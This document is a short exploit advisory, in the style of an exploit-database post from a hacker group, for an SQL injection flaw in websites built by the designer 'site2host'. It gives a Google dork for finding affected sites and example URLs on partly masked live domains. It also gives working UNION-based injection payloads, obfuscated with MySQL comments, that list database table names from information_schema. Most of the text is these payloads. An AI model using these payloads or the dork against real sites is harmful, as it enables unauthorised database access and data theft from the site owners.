##################################################### site2host Web Design Sql Injection Vulnerability ##################################################### # Exploit Title : site2host Web Design Sql Injection Vulnerability # Google Dork: inurl:Site Designed by Site2host.com #vender : http://site2host.com/ #Author: BHG Security Center # Home: http://cc.black-hg.org/ - http://greyh4t.com/cc/ # Tested on: [linux+apache] # Finder(s):Siavash (morghabi_s@yahoo.com) # Examle: http://sk-iXXXia.com/cms.php?cat_id=582%27 http://balaXXXaniks.com/product_catalog.php?product_cat_id=16%27 http://glaXXXnky.com/product_list.php?cat_id=656&cat_parent_id=&product_cat_id=3%27 http://glaXXXnky.com/product_list.php?cat_id=656&cat_parent_id=&product_cat_id=-3+/*!50000UnIoN*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+ http://glXXXXnky.com/product_list.php?cat_id=656&cat_parent_id=&product_cat_id=-3+/*!50000UnIoN*/+select+1,2,3,4,5,6,7,8,9,10,11,12,/*!50000cOnCat*/%28/*!table_name*/%29,14,15,16,17,18+/*!From*/+information_schema./**/tAblES+/*!50000Where*/+/*!Table_ScHEmA*/=schEMA%28%29%20limit+1,1-- http://glamXXXnky.com/product_list.php?cat_id=656&cat_parent_id=&product_cat_id=-3+/*!50000UnIoN*/+select+1,2,3,4,5,6,7,8,9,10,11,12,/*!50000cOnCat*/%28/*!table_name*/%29,14,15,16,17,18+/*!From*/+information_schema./**/tAblES--+ ################################################## [-] Disclosure timeline: [04/08/2011] - Vulnerabilities discovered [14/10/2011] - Others vulnerabilities discovered [15/10/2011] - Issues reported to http://black-hg.org/ [04/09/2012] - Public disclosure # Greets To : Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t ~ Mr.XHat ~ Dj.TiniVini ~ Siamak.Black ~ 0x0ptim0us THANKS TO ALL Iranian HackerZ ./Persian Gulf ===========================================[End]=============================================